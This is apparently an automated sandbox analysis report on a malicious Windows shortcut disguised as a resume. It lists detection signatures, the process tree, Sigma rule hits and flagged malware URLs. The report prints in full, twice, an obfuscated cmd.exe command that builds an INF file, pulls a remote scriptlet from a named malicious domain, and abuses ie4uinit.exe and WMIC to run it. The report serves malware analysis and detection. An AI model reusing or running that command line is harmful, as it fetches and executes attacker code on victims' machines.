Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
My Resume.lnk

Overview

General Information

Sample Name:My Resume.lnk
Analysis ID:564458
MD5:e1db05e6be33812c6289741472e9abe3
SHA1:ca863c49be257e9ed0033a4c18bb3400c2396029
SHA256:d6906cb7f9fb0f9cd12943509a1bb5e9409a4547a18f930b071d5c330e6c97f9
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Antivirus detection for URL or domain
Sigma detected: Copying Sensitive Files with Credential Data
Checks if browser processes are running
Creates processes via WMI
Obfuscated command line found
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Windows shortcut file (LNK) contains suspicious strings
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
Sigma detected: Suspicious WMI Execution
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 6920 cmdline: C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 6268 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ie4uinit.exe (PID: 6940 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)
    • ie4uinit.exe (PID: 4788 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)
      • rundll32.exe (PID: 2884 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 204 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, CommandLine: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe, ParentProcessId: 4788, ProcessCommandLine: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, ProcessId: 2884
Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", CommandLine: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6920, ProcessCommandLine: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", ProcessId: 6268

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://jamesreuther.com/wmnxjogbfnMAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfniAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfndAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfn4Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnSAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnuAvira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522763C CryptStringToBinaryW,CryptStringToBinaryW,GetLastError,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522763C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522EA9C memcpy_s,CryptCreateHash,CryptHashData,CryptDeriveKey,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522EA9C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52256A4 CryptBinaryToStringA,CryptBinaryToStringA,GetLastError,GetLastError,7_2_00007FF6B52256A4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5227AC8 CertOpenStore,CertFindCertificateInStore,CryptImportPublicKeyInfo,GetLastError,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6B5227AC8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522E950 CryptImportPublicKeyInfo,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522E950
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5222550 CryptReleaseContext,7_2_00007FF6B5222550
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522ED98 memcpy_s,memcpy_s,CryptGenRandom,memcpy_s,EnterCriticalSection,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522ED98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5227DCC memset,CryptHashCertificate,memcmp,GetLastError,7_2_00007FF6B5227DCC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52225C0 CryptAcquireContextW,CryptReleaseContext,7_2_00007FF6B52225C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522544C strnlen,isalnum,CryptStringToBinaryA,CryptStringToBinaryA,GetLastError,GetLastError,7_2_00007FF6B522544C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52274BC CryptCreateHash,CryptSetHashParam,CryptVerifySignatureW,GetLastError,CryptDestroyKey,GetLastError,CryptDestroyHash,GetLastError,7_2_00007FF6B52274BC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522F108 CryptSetKeyParam,memcpy_s,CryptEncrypt,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522F108
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522E750 CryptAcquireContextW,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522E750
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5222B50 CryptGenRandom,GetLastError,SysFreeString,7_2_00007FF6B5222B50
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522EFAC CryptCreateHash,memset,CryptSetHashParam,CryptHashData,CryptGetHashParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522EFAC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522EBE0 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6B522EBE0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52273D0 CryptCreateHash,CryptHashData,CryptGetHashParam,GetLastError,CryptDestroyHash,GetLastError,7_2_00007FF6B52273D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522E80C CryptGenRandom,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522E80C